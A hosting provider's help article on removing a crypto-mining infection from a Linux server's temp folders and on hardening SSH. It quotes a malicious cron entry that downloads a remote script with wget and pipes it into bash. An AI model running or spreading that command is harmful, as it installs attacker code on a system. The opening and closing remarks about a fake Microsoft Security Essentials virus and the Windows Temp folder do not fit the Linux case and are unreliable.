Are you trying to get rid of malicious tmp processes or files?
This guide is for you.
TMP is an executable file downloaded and used by the virus, Fake Microsoft Security Essentials Alert. Fake Microsoft Security Essentials attempts to do this by flooding your computer with pop-up alerts telling you that your computer is infected.
Recently, one of our customers contacted us siting that there was a process showing in CPU stats that consumed around 90%.
This was a crypto miner malware and this should be deleted from the server.
Here at Ibmi Media, as part of our Server Management Services, we regularly help our Custometers to resolve Linux related errors.
In this context, we shall look into how to resolve malicious tmp processes issue.
Malicious tmp processes and files are caused by the following factors:
i. A brute force attack against SSH accounts.
ii. Automated installation of a pre-compiled binary once access is obtained.
iii. Modifying the system to ensure malware persistence.
iv. Start mining cryptocurrencies on the victim’s CPU or GPU.
Mostly, this attack is not destructive. But we can't ensure what else was modified during the attack. So we have to reload the affected system completely from known good backups which wastes our time.
Here, you will learn how to resolve this problem.
To begin, we check whether the process is running using the command given below:
ps aux | grep <processname>
We look at the cronjob of this user:
crontab -u username -l
If it has this string:
* * * * wget -q -O – http://192.98.132.xxy:8220/mr.sh | bash -sh > /dev/null 2>&1
Then we edit this cronjob using the below command:
crontab -e -u username
OR
Delete the cronjob using the below command:
crontab -r -u username
Then delete the corresponding files in /var/tmp and /tmp folder:
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123
To protect against these attacks, here are the different steps our Support Experts suggest to our customers.
1. Disabling all default system login accounts.
2. Disabling SSH password logins and set SSH private key authentication.
3. Enabling two-factor authentication for SSH.
4. Blocking access to all network services that do not need to be exposed to the Internet (for example, databases, control panels and SSH ports).
5. Also, make sure to monitor systems for unusual CPU, memory, disk, and network activity.
6. Use host-based intrusion detection to spot any problems that might have slipped through.
This article covers method to resolve malicious tmp processes. Most malware installers delete itself and these TMP files after successful installation.
The use of TMP files for atomicity is an advantage attackers currently enjoy.
They could have done this operation in any folder of the system, but they choose to use the standard Windows Temp folder.
The first thing a malware installer (first stage of infection) does when executed on a target system - be it a dropper or downloader - is to install a copy of the malware and its components into their corresponding location in the system.